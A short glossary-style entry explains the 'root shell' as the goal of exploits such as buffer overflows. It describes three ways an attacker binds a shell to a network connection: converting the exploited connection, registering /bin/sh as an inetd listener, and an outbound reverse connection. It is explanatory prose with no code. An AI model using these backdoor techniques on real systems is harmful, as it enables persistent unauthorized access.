|
|
The "holy grail" of an attack (such as a buffer overflow) is the creation of a "root shell". On UNIX, the "root" user has control over the machine. An exploit will attempt to obtain a shell prompt from which any command can be entered that will execute with root privileges. In many remote attacks, the attacker will run an exploit script that breaks into the server, then establishes a root shell bound to a TCP connection. The attacker can then remotely enter commands into the system. There are three ways that such shells can be bound to connections: - conversion
- The TCP connection used to exploit the server (such as for FTP, DNS, RPC) is converted to a shell-prompt.
- listen
- The most popular mechanism is to register /bin/sh within the inetd service bound to a particular port. This will allow the attacker back into the server at any time by connecting to that port. This has the disadvantage that firewalls will often block access to this additional port.
- connect
- The exploit code creates an outbound connection from the exploited machine back to the attacker.
|
